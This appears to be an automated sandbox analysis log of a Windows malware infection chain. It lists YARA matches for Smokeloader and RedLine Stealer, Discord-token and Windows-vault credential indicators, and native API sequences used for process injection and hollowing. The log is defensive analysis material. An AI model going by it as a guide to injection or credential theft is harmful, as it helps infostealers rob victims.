                      Source: 25.0.9D1E.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                      Source: 00000023.00000002.2438435687.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000022.00000002.2579381005.0000000000730000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000001F.00000002.2469988089.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000023.00000002.2438711950.000000000063D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000003.00000002.1987664254.00000000006EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000003.00000002.1984120576.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000022.00000002.2578412540.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, type: DROPPEDMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401729
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401553
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401561
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_0040156B
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_0040156F
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401729
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004023E5 NtQuerySystemInformation,3_2_004023E5
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401583
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401587
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004026A0 NtEnumerateKey,3_2_004026A0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC1C80 NtCreateThreadEx,7_2_04DC1C80
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeCode function: 13_2_028F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,13_2_028F0110
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C4EE8: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,21_2_00007FF73D0C4EE8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0ADF24 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,21_2_00007FF73D0ADF24
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BE520 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,21_2_00007FF73D0BE520
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00414C0D0_2_00414C0D
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0041580D0_2_0041580D
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_004147380_2_00414738
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_00414FE10_2_00414FE1
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_004153ED0_2_004153ED
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00414C0D3_2_00414C0D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_0041580D3_2_0041580D
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004147383_2_00414738
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_00414FE13_2_00414FE1
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwCode function: 3_2_004153ED3_2_004153ED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C810007_2_04C81000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C827087_2_04C82708
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C8446C7_2_04C8446C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C852607_2_04C85260
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C817C47_2_04C817C4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C82C187_2_04C82C18
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04C831387_2_04C83138
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC90D07_2_04DC90D0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC1FC07_2_04DC1FC0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC16E97_2_04DC16E9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC1C807_2_04DC1C80
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC22807_2_04DC2280
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC47B07_2_04DC47B0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC89B07_2_04DC89B0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC87107_2_04DC8710
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC4A207_2_04DC4A20
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC86F07_2_04DC86F0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC18E07_2_04DC18E0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC8C807_2_04DC8C80
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC7F607_2_04DC7F60
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC9B107_2_04DC9B10
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC870F7_2_04DC870F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC82207_2_04DC8220
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04DC10207_2_04DC1020
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0040ADB08_2_0040ADB0
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004067D58_2_004067D5
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004160B38_2_004160B3
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004141C28_2_004141C2
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004242238_2_00424223
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00415A978_2_00415A97
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041637A8_2_0041637A
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00413BFB8_2_00413BFB
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00424BB18_2_00424BB1
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00424C8B8_2_00424C8B
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004134908_2_00413490
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00414C9A8_2_00414C9A
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0040DD328_2_0040DD32
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004135CF8_2_004135CF
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00415E098_2_00415E09
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004166358_2_00416635
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00424F238_2_00424F23
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004137938_2_00413793
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D051C9021_2_00007FF73D051C90
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D050E0021_2_00007FF73D050E00
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D04E63021_2_00007FF73D04E630
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D05DE3C21_2_00007FF73D05DE3C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06FE6021_2_00007FF73D06FE60
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D7D6021_2_00007FF73D0D7D60
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D081DD021_2_00007FF73D081DD0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D077DEC21_2_00007FF73D077DEC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0EE0C021_2_00007FF73D0EE0C0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D079A6021_2_00007FF73D079A60
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D049B1021_2_00007FF73D049B10
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0539C021_2_00007FF73D0539C0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0E1C7821_2_00007FF73D0E1C78
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D071CE021_2_00007FF73D071CE0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D065B9C21_2_00007FF73D065B9C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D07366A21_2_00007FF73D07366A
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D04F6AD21_2_00007FF73D04F6AD
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D04169C21_2_00007FF73D04169C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0E16E821_2_00007FF73D0E16E8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D08582C21_2_00007FF73D08582C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D05F81F21_2_00007FF73D05F81F
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0ED90821_2_00007FF73D0ED908
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0EB7CC21_2_00007FF73D0EB7CC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0832B021_2_00007FF73D0832B0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D319821_2_00007FF73D0D3198
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D744C21_2_00007FF73D0D744C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D948C21_2_00007FF73D0D948C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C949C21_2_00007FF73D0C949C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D08737421_2_00007FF73D087374
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D07AD5021_2_00007FF73D07AD50
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D086D8021_2_00007FF73D086D80
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D04902021_2_00007FF73D049020
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D04304C21_2_00007FF73D04304C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D07897021_2_00007FF73D078970
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06C98C21_2_00007FF73D06C98C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D08299021_2_00007FF73D082990
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0ECC4021_2_00007FF73D0ECC40
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D05EC7421_2_00007FF73D05EC74
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0EECD021_2_00007FF73D0EECD0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BE64C21_2_00007FF73D0BE64C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06C6C021_2_00007FF73D06C6C0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0F28FC21_2_00007FF73D0F28FC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C28FC21_2_00007FF73D0C28FC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D67CC21_2_00007FF73D0D67CC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0E07BC21_2_00007FF73D0E07BC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06C44421_2_00007FF73D06C444
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D06433C21_2_00007FF73D06433C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D43D821_2_00007FF73D0D43D8
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe ACEE0678E7B8E07828826E0C2C8244357FCE25FF63D823EB987E25CF2494A6D3
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: String function: 00007FF73D0692E8 appears 76 times
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: String function: 0041A290 appears 31 times
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: String function: 0040476F appears 44 times
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736
                      Source: 1600.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: Zoo.8.drStatic PE information: No import functions for PE file found
                      Source: Zoo.8.drStatic PE information: Data appended to the last section found
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: csunsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: csunsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: aep.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: atasi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: nuronssl.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: ubsec.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: aep.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: atasi.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: swift.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: nfhwcrhk.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: nuronssl.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: surewarehook.dll
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeSection loaded: ubsec.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dll
                      Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dll
                      Source: 987123.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 30.0.E35F.exe.db8096.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 42.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 30.0.E35F.exe.db8096.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 30.0.E35F.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 49.0.FD8E.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                      Source: 25.0.9D1E.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                      Source: 00000023.00000002.2438435687.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000022.00000002.2579381005.0000000000730000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
